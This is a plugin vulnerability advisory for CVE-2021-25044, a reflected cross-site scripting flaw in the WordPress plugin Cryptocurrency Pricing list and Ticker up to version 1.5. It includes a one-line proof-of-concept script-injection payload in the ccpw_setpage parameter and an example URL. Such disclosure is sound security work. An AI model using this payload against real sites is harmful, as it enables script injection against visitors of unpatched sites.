Cryptocurrency Pricing list and Ticker <= 1.5 – Reflected Cross-Site Scripting | CVE 2021-25044 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the ccpw_setpage parameter before outputting it back in pages where its shortcode is embed, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

Append the following URL parameter on a page where the [ccpw_currencies_with_price] shortcode is embed: ccpw_setpage=1"><script>alert(/XSS/)</script>

e.g: https://example.com/page_with_shortcode/?ccpw_setpage=1"><script>alert(/XSS/)</script>

Affects Plugins

cryptocurrency-pricing-list

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Jeremie Amsellem

Submitter

Jeremie Amsellem

Submitter website

https://fenrir.pro

Submitter twitter

Verified

Yes

WPVDB ID

dc1507c1-8894-4ab6-b25f-c5e26a425b03

Timeline

Publicly Published

2022-09-14 (about 1 years ago)

Added

2022-09-14 (about 1 years ago)

Last Updated

2022-09-14 (about 1 years ago)

Other

Published

Title

Published

2021-01-29

Title

Modern Events Calendar Lite < 5.16.5 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2023-02-15

Title

WP BaiDu Submit <= 1.2.1 - Admin+ Stored XSS

Published

2024-03-05

Title

Simple Membership < 4.4.3 - Unauthenticated Stored Self-Based Cross-Site Scripting

Published

2024-03-27

Title

Easy Social Feed < 6.5.6 - Contributor+ Stored XSS

Published

2014-08-01

Title

Pretty Link Lite <= 1.6.2 - XSS in SWF